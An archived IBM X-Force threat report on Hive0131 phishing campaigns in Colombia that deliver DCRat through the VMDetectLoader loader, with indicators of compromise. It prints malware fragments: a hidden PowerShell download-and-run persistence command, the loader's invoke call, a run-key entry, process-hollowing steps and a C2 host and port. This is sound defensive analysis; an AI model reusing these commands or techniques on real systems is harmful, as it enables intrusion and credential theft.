{
	"id": "5b004acc-00fb-4cb6-abe5-0868522cae5f",
	"created_at": "2026-04-06T00:13:01.973531Z",
	"updated_at": "2026-04-10T03:21:53.369819Z",
	"deleted_at": null,
	"sha1_hash": "2c83d7e4fdbd9d776f9f0a7ab96b520945960b77",
	"title": "IBM X-Force Threat Analysis: DCRat presence growing in Latin America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 974435,
	"plain_text": "IBM X-Force Threat Analysis: DCRat presence growing in Latin\r\nAmerica\r\nBy Melissa Frydrych, Kevin Henson\r\nPublished: 2025-06-03 · Archived: 2026-04-05 20:18:55 UTC\r\nKevin Henson\r\nMalware Reverse Engineer\r\nIBM\r\nIn early May 2025, IBM X-Force observed Hive0131 conducting email campaigns targeting users in Colombia\r\nwith electronic notifications of criminal proceedings, purporting to be from The Judiciary of Colombia. Hive0131\r\nis a financially motivated group likely originating from South America that routinely conducts campaigns largely\r\nin Latin America (LATAM) to deliver a wide array of commodity payloads. The current campaigns imitate official\r\ncorrespondence and contain either an embedded link or a PDF lure with an embedded link. Clicking on the\r\nembedded link will initiate the infection chain to execute the banking trojan \"DCRat\" in memory. \r\nDCRat is operated as a Malware-as-a-Service (MaaS), first appearing in at least 2018, and heavily advertised on\r\nRussian cyber crime forums, purchasable for around USD 7 for a two-month subscription. DCRat's presence is\r\nwidespread and has become increasingly popular in LATAM since at least 2024. Over the summer of 2024, X-Force observed several campaigns heavily targeting entities in Colombia, all imitating a LATAM company\r\nspecializing in electronic document ecosystems in Mexico and Colombia. However, given the differences in\r\ninfection chain and the delivery of DCRat, X-Force assesses that the 2024 and current campaigns were conducted\r\nby different actors. The campaigns observed in 2024 relied heavily on password-protected RAR files containing\r\nNSIS to execute a GuLoader downloader, whereas these recent campaigns rely on an obfuscated .NET loader\r\nwe've named VMDetectLoader. \r\nDCRat capabilities\r\nBypasses AMSI\r\nDetects analysis environments\r\nKills blocklisted processes\r\nObtains persistence through a scheduled task or registry key\r\nListens for commands from a command and control (C2) server\r\nDCRat comes with plugins that are capable of the following tasks, although threat actors can create custom\r\nplugins in order to accomplish additional tasks:\r\nRecording a victim through the computer's microphone or camera\r\nUploading and downloading files\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 1 of 10\n\nExecuting commands\r\nObtaining system information\r\nEncrypting and decrypting files\r\nEditing registry keys\r\nLogging keystrokes and clipboard data\r\nManipulating the filesystem\r\nThreat type\r\nAnalysis\r\nIn early May 2025, X-Force observed Hive0131 email campaigns imitating The Judiciary of Colombia (Rama\r\nJudicial de Colombia), purporting to be from the Civil Circuit of Bogota, Colombia, to send out electronic\r\nnotifications of criminal proceedings. The observed campaigns either contain a PDF lure with a link to a TinyURL\r\nor contain an embedded link to a Google Docs location. \r\nInfection Chain Overview - PDF with TinyURL\r\nFor the emails containing a PDF lure leading to a tinyurl, the victim is redirected to a ZIP archive\r\nnamed 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. The ZIP\r\narchive contains benign files as well as a malicious JavaScript file named 1Juzgado 08 Civil Circuito de Bogotá\r\nNotificacion electronica Orden de Embargo.js. The JavaScript file downloads a JavaScript payload from a\r\npaste[.]ee site and executes it. This payload then executes a PowerShell command that downloads a JPG\r\nfrom hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg with a base64-encoded loader appended to\r\nthe end of the file. Once executed, the loader downloads and executes DCRat in memory.\r\nThe loader is given the name VMDetectLoader due to its ability to determine if it's running in a sandbox\r\nenvironment. Analysis indicates that the loader is based on the open-source\r\nproject https://github.com/robsonfelix/VMDetector.\r\nFigure 1: RAMA Infection Chain\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 2 of 10\n\nFigure 2: Sample email with PDF lure\r\nInfection chain overview - Embedded Google Docs link\r\nThis infection chain is initiated with phishing emails that contain a link to a Google Docs download of a\r\npassword-protected ZIP archive named CUI 158616000129-2025-10047_122011111777.zip, the password of\r\nwhich is in the email and is 3004. The archive contains a batch file downloader, CUI 158616000129-2025-\r\n10047_122011111777.bat, that downloads and executes an obfuscated VBScript (VBS) component\r\nfromhxxp://paste[.]ee/d/jYHEqBJ3/0  to %WinDir%\\Temp\\Pernambuco.vbs. The VBS script subsequently\r\ndecodes and executes a base64-encoded PowerShell script that downloads VMDetectLoader via a JPG file\r\nfromhxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg . \r\nThe final payload is then downloaded by VMDetectLoader via a paste[.]ee URL passed to it by the PowerShell\r\nscript.\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 3 of 10\n\nFigure 3: RAMA infection chain with Google Docs\r\nFigure 4: Sample email with Google Docs link\r\nVMDetectLoader\r\nVMDetectLoader is an obfuscated .NET loader (Microsoft.Win32.TaskScheduler.dll) which can be found on\r\nVirusTotal at\r\nhttps://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7.\r\nAnalysis of the loader's metadata indicates that the code is based on the open-source\r\nproject https://github.com/robsonfelix/VMDetector.\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 4 of 10\n\nAssembly Attributes:\r\n[assembly: AssemblyVersion(\"1.1.0.0\")] [assembly: CompilationRelaxations(8)] [assembly:\r\nRuntimeCompatibility(WrapNonExceptionThrows = true)] [assembly:\r\nDebuggable(DebuggableAttribute.DebuggingModes.Default |\r\nDebuggableAttribute.DebuggingModes.DisableOptimizations |\r\nDebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |\r\nDebuggableAttribute.DebuggingModes.EnableEditAndContinue)] [assembly: AssemblyTitle(\"VMDetector\")]\r\n[assembly: AssemblyCompany(\"Robson Felix\")] [assembly: AssemblyProduct(\"VMDetector\")] [assembly:\r\nAssemblyCopyright(\"Copyright © Robson Felix 2017\")] [assembly: AssemblyTrademark(\"\")] [assembly:\r\nTargetFramework(\".NETFramework,Version=v4.5\", FrameworkDisplayName = \"\")] [assembly:\r\nSecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]\r\nBefore loading the payload, the loader detects virtual machines, printing a list of host attributes to the console if a\r\nVM is detected. For example:\r\nMOTHERBOARD INFO ================ Availability = 3 Caption = Motherboard\r\nConfigManagerErrorCode = ConfigManagerUserConfig = CreationClassName = Win32_MotherBoardDevice\r\nDescription = Motherboard DeviceID = Motherboard ErrorCleared = ErrorDescription = InstallDate =\r\nLastErrorCode = Name = Motherboard PNPDeviceID = PowerManagementCapabilities =\r\nPowerManagementSupported = PrimaryBusType = PCI RevisionNumber = SecondaryBusType = ISA Status =\r\nOK StatusInfo = SystemCreationClassName = Win32_ComputerSystem SystemName = DESKTOP-LettersNumbers -------------------------------------------------------------- Asserting ? Detected as virtual machine given\r\nkey computer information. Detected as virtual machine given bios information. Detected as virtual machine given\r\nhard disk information. Detected as virtual machine given PnP devices information. Detected as virtual machine\r\ngiven Windows services information.\r\nFunctionality\r\nVMDetectLoader is executed via its dnlib.IO.Home.VAI()  function and passed data similar to the following. This\r\ninformation may vary depending on the campaign.\r\n[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]\r\n@($storeman,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','rhabdo 'rhabdosteus','js','','','bimetallism','1',''));\r\nArgument Description\r\n$storeman  Reversed Pastee URL from which a base64-encoded payload is downloaded. \r\nMSBuilld  Target injection process\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 5 of 10\n\nC:\\Users\\Public\\Downloads\r\nrhabdosteus\r\njs\r\n Path used in creating a scheduled task: \r\nC:\\Users\\Public\\Downloads\\rhabdosteus.js\r\n1  Flag that indicates process checks\r\nbimetallism  Scheduled task name\r\nDuring execution, VMDetectLoader, XOR decrypts notable strings as needed from the .NET resource \"hIXS\".\r\nSample decrypted strings\r\nvmware Microsoft Virtual PC {{ A = {0}, B = {1} }} --------------------------------------------------------------\r\nMicrosoft Hyper-V qemu vbox VirtualBox BiosCharacteristics {{ A = {0}, B = {1}, C = {2} }}\r\nSYSTEM\\CurrentControlSet\\Services\\ Caption {{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6},\r\nH = {7}, I = {8} }} Win32_ComputerSystem OEMStringArray Win32_BIOS Win32_MotherboardDevice\r\nWin32_PnPEntity Win32_DiskDrive MOTHERBOARD INFO ================ BIOS INFO =========\r\nCOMPUTER INFO ============= DEVICES INFO ============ HARD DRIVES INFO WINDOWS\r\nSERVICES virtual ImagePath name .exe Name Manufacturer Model Description Detected as virtual machine\r\ngiven PnP devices information. Detected as virtual machine given processes information. Detected as virtual\r\nmachine given Windows services information.\r\nPersistence\r\nIf configured to do so, a scheduled task is created to execute the following PowerShell command which\r\ndownloads and executes a JavaScript payload:\r\n-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Invoke- WebRequest -Uri '' -OutFile\r\n'C:\\Users\\Public\\Downloads\\rhabdosteus.js'; Start- Process 'C:\\Users\\Public\\Downloads\\rhabdosteus.js'\"\r\nAnother task may be created, if configured, to execute the JavaScript payload using the following command:\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 6 of 10\n\nwscript.exe C:\\Users\\Public\\Downloads\\rhabdosteus.js\r\nThe loader may also create a Registry run key to execute the payload:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run = \u003cpayload\u003e.js\r\nProcess injection\r\nVMDetectLoader has the ability to use the process hollowing injection technique to load a payload into varying\r\ntarget process instances. For example, for the analyzed campaign,\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe (32-\r\nbit) or C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe (64-bit) is the target process. The\r\nfunction responsible for process injection is named HackForums.gigajew.x64.Load() for 64-bit samples\r\nand dnlib.IO.Tools.Ande() for 32-bit samples.\r\nProcess hollowing injection process:\r\n1. Create a suspended process using CreateProcess() with the dwCreationFlags set to\r\nCREATE_SUSPENDED (4).\r\n2. Unmap memory in the target process using ZwUnmapViewOfSection().\r\n3. Allocate new memory in the target process using VirtualAllocEx().\r\n4. Write the payload to the newly allocated memory using WriteProcessMemory().\r\n5. Update the entry point for the process using GetThreadContext() and SetThreadContex().\r\n6. Execute ResumeThread() to execute the code.\r\nDCRat\r\nIf VMDetectLoader determines that it's running in a safe environment, the final payload is loaded via process\r\nhollowing. In this instance, the final payload is DCRat with the following configuration data.\r\n----- File: Client.exe ----- Field         Value ------------  ----------------------------------------------------------------\r\nParser        acce:DcRat File Path Description   DcRat Implant (qwqdanchun) Architecture  x86 MD5          \r\neeed02e7ebbfe382b3d3af40fffb9ceb SHA1          f2f9b1205bfcccb738b03531a8bce39478443463 SHA256       \r\n1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140 Compile Time  2021-05-\r\n05T21:11:39+00:00 ---- Encryption Key ---- Tags           Key                                                                                     \r\n      Algorithm    Mode -------------  -----------------------------------------------------------------------------------------------\r\n-----  -----------  ------ configuration \r\n0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab    AES          CBC configuration \r\n0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da\r\nca070bf4659624c77d2819 HMAC-SHA256                  0f2f5c75e985d9a1d59f72086b8811 ---- Interval ----  \r\nValue -------       1 ---- Mutex ---- Value --------------------- DcRatMutex_qwqdanchun ---- RSA Public Key ----\r\nTags              Value ----------------  ------------------------------------------------- x509_certificate  Modulus (n):            \r\n          81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:                       8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:  \r\n                    49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:                      \r\na9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:                       53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:            \r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 7 of 10\n\neb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:                       e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:\r\n                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:                       74:9b:24:49:b4:49:1b:4d                  \r\nPublic Exponent (e):                       65537 (0x10001) ---- Socket ---- Tags    Address               Port  Network\r\nProtocol ------  ------------------  ------  ------------------ c2      feb18.freeddns.org    8848  TCP ---- Version ---- Value\r\n------- 1.0.7\r\n---- Miscellaneous ---- Key                             Value ------------------------------  --------------------------------------------\r\n-------------------------------------------------------- BSOD                            False group                           ::: 30  :::\r\nAntiProcess                     False Anti                            False self_installation_flag          False\r\nx509_certificate_serial_number  1073276135051967865277505007812279690413261813057 server_signature     \r\n          b\"\\x1a\\xebHiD\\x1d\\xa5\\x04\\xa4\\xce\\xb4\\xd8=9\\x08d\\xfa\\xe2\\xdeT\\x14T\\xdbX\\x00\\x1\r\nx12\u003c}\\x7f\\x91E7*r%f\\xcei\r\n\\xde\\x9d\\xd9\\x93\\x08\\xce\\xc9\\x8c\\x1c\\x98\\x9e_O@j\\xc0\\xcb\\x9a\\x00)_\\x05\\x15M\\xe xe2\\x9eg\\x05a0p-\\xac\\x\r\n11\\xdd\\xac\\x7fa\\x9e\\xbc\\x96\\xc6F\\xc6\\xd426\\x82\\x16\\x1d\\x8c0\\x95N\\x0c\\x19\\x10\\x xb24\\xa8\\x9aRW'\\x10E\\    \r\n                              xb3\\xc3\\xb5\\x8d\\x04- -\\xdb#\\xc7\\x9fW\\x0c\\x93\\x91\\x004\\x16vq\\xb5U|\\xa8r\"\r\nserver_signature_valid          True ---- Logs ---- [+] File Client.exe identified as DcRat Implant (qwqdanchun). [+]\r\nStarting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected results include c2 socket addresses,\r\na version, a mutex, aes-cbc decryption parameters, an SSL certificate and server signature, an interval, varying\r\nflags, and possibly a filepath and a group. [-] Cannot update settings field 0400000f. [+] A dead-drop resolver\r\nURL is not set in the configuration. [+] Completed parsing using DcRat Implant (qwqdanchun) for sample\r\nClient.exe. ----- File Tree ----- \u003cClient.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)\u003e\r\nConclusion\r\nX-Force tracks several groups operating in the Latin American threat landscape that conduct email campaigns\r\ndelivering MaaS for the purpose of financial gain. Among the tracked groups are Hive0148 and Hive0149, which\r\nfocus on delivering the Grandoriero Banking Trojan, Hive0153 delivering Adwind and SambaSpy malware, and\r\nHive0131. Although Hive0131 typically focuses on operations with the delivery of malware such as QuasarRAT\r\nand NjRAT, X-Force has observed an increase in campaigns involving DCRat. With the steady and ongoing\r\nobservances of banking malware delivered to users within LATAM, IBM X-Force assesses that Latin America will\r\ncontinue to face targeting from threat actors seeking to deploy banking trojans via phishing campaigns in attempts\r\nto obtain user credentials and other sensitive information.\r\nRecommendations\r\nEntities in LATAM are encouraged to exercise caution with emails containing attachments, links, or that prompt\r\nfile downloads. In addition, entities are advised to perform the following:\r\nExercise caution with emails containing links or download prompts\r\nMonitor for host-based evidence of process injection, rogue process creation, scheduled tasks creation, and\r\nregistry modifications\r\nInstall, update and configure endpoint security software\r\nMonitor endpoint rules\r\nHunt for the execution policy bypass\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 8 of 10\n\nIndicators of compromise\r\nIndicator\r\n Indicator\r\nType\r\n  Context\r\n4ce1d456fa8831733ac01c4a2a32044b6581664d3\r\n11b8791bb2efaa2a1d01f17\r\n SHA256  Carrier File \r\n6a632d8356f42694adb21c064aa9e8710b65addd\r\nfdf2209d293ded12fe3d46a7\r\n SHA256  ZIP Archive\r\n1603c606d62e7794da09c51ca7f321bb555044916\r\n5b4fe81153020021cbce140\r\n SHA256  DCRat\r\nceb88c09069b5ddc8ca525b7f2e26c4852465bc0\r\ned7c665df39c646287a2f17e    \r\n SHA256  JS\r\n0df13fd42fb4a4374981474ea87895a3830eddcc7f3\r\nbd494e76acd604c4004f7\r\n SHA256\r\n Obfuscated .NET\r\nLoader\r\ndb21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8\r\n37189c6551010a6f828590\r\n SHA256  ZIP Archive\r\n3c95678d140825b56e04298ce6238ce22b34611d25\r\n82ac736c909296ca137ed1\r\n SHA256  PS Script\r\n7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328\r\nde106b3d5491372ccf\r\n SHA256  PS Script\r\nb16588e0e2c6a0c8ff080ded57abe8159008d040ae\r\na78b2e801c17ce79f05863\r\n SHA256\r\n Batch Script\r\nDownloader\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 9 of 10\n\nhxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8\r\n-4516-82e7-5460d4ebaf3b\r\n URL\r\n Embedded PDF\r\nLink\r\nhxxp://paste[.]ee/d/bx699sF9/0  URL\r\n Payload\r\nDownload URL\r\nhxxps://docs[.]google[.]com/uc?\r\nexport=download\u0026id=1aJuQtm8YUqZv12E-atslt_GvBWZ\r\nNbWIK\r\n URL\r\n Embedded Email\r\nLink\r\nhxxp://paste[.]ee/d/jYHEqBJ3/0  URL\r\n Payload\r\nDownload URL\r\nhxxps://archive[.]org/download/new_ABBAS/new_\r\nABBAS.jpg\r\n URL\r\n JPG Download\r\nURL\r\nhxxps://ia601205.us.archive[.]org/26/items/new_\r\nimage_20250430/new_image.jpg\r\n   URL\r\n JPG Download\r\nURL\r\nIBM X-Force Premier Threat Intelligence is now integrated with OpenCTI, delivering actionable threat\r\nintelligence about this threat activity and more. Access insights on threat actors, malware and industry risks.\r\nInstall the OpenCTI Connector to enhance detection and response, strengthening your cybersecurity with IBM\r\nX-Force’s expertise. Stay ahead—integrate today.\r\nSource: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america"
	],
	"report_names": [
		"dcrat-presence-growing-in-latin-america"
	],
	"threat_actors": [],
	"ts_created_at": 1775434381,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.pdf",
		"text": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.txt",
		"img": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.jpg"
	}
}